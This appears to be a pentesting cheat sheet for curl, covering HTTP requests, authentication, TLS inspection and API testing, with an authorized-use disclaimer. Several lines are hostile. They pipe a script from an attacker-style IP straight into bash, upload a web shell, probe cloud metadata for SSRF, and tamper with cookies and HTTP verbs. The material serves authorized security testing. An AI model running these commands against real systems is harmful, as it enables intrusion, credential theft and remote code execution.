curl Cheat Sheet
Versatile CLI for HTTP(S), file transfer, headers, and scripting web/API tests during pentests.
Overview
curl transfers data with URL syntax. Core tool for probing APIs, bypassing client restrictions, testing SSRF payloads, downloading shells, and inspecting TLS/certificate behavior.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y curlcurl --versionEssential commands
GET with headers
curl -i https://target/api/v1/usersPOST JSON
curl -s -X POST https://target/login -H 'Content-Type: application/json'-d '{"user":"admin","pass":"test"}'Save output
curl -o page.html https://target/curl -O https://target/file.zip # remote filenameCommon workflows
Authentication / cookies —
curl -c cookies.txt -b cookies.txt -L https://target/dashboardcurl -u user:pass https://target/basic-authcurl -H "Authorization: Bearer TOKEN" https://target/apiCustom verbs and headers —
curl -X PUT -H 'X-Custom: value' -d 'data' https://target/resourcecurl -X OPTIONS -i https://target/curl -H "Host: internal.local" http://10.10.10.5/SSRF / internal probe (authorized) —
curl -s "http://169.254.169.254/latest/meta-data/"curl -g "http://[::ffff:169.254.169.254]/"TLS / cert inspection —
curl -vI https://target/ 2>&1 | grep -E 'subject:|issuer:|SSL'curl --insecure https://selfsigned.local/ # lab onlyUpload file (multipart) —
curl -F "file=@shell.php" -F "submit=upload" https://target/upload.phpRate / timing —
curl -w '@-' -o /dev/null -s https://target/ <<'EOF'time_namelookup: %{time_namelookup}\ntime_connect: %{time_connect}\ntime_total: %{time_total}\nEOFFlags reference
-X METHOD | HTTP method |
|---|---|
-H "Header: val" | Request header |
-d DATA | POST body |
-L | Follow redirects |
-k | Insecure TLS |
-v | Verbose |
-s | Silent (no progress) |
--proxy http://127.0.0.1:8080 | Burp intercept |
-A "User-Agent" | Spoof UA |
Quick one-liners
Show only the HTTP response headers
curl -sI https://target/Print only the HTTP status code
curl -s -o /dev/null -w '%{http_code}\n' https://target/Send a raw cookie header
curl -b 'session=eyJ...; role=admin' https://target/dashboardRoute all traffic through Burp/ZAP for inspection
curl -x http://127.0.0.1:8080 -k https://target/Download and pipe a script straight to bash (lab only)
curl -s http://10.10.14.5/x.sh | bashFollow redirects but cap them (avoid loops)
curl -L --max-redirs 5 https://target/Resolve a host to a chosen IP (vhost / split-horizon tests)
curl --resolve target.local:443:10.10.10.5 https://target.local/Send a urlencoded form body
curl --data-urlencode 'q=admin'\''--' https://target/searchAuth & API testing
Bearer token request to a JSON API
curl -s -H 'Authorization: Bearer TOKEN' https://target/api/v1/me | jq .Basic auth
curl -u admin:password https://target/adminReplay a JWT and decode the payload
curl -s -H "Authorization: Bearer $JWT" https://target/api | jq .GraphQL introspection query
curl -s -X POST https://target/graphql -H 'Content-Type: application/json' -d '{"query":"{__schema{types{name}}}"}'Test an HTTP method override (verb tampering)
curl -X POST -H 'X-HTTP-Method-Override: PUT' https://target/resourceTips
- Use --path-as-is to prevent curl normalizing ../ in paths (cache poisoning tests).
- curl --compressed requests gzip/br decoding.
- Pipe to jq for JSON APIs: curl -s URL | jq .
- Prefer Burp Repeater for complex sessions; curl for automation and CI.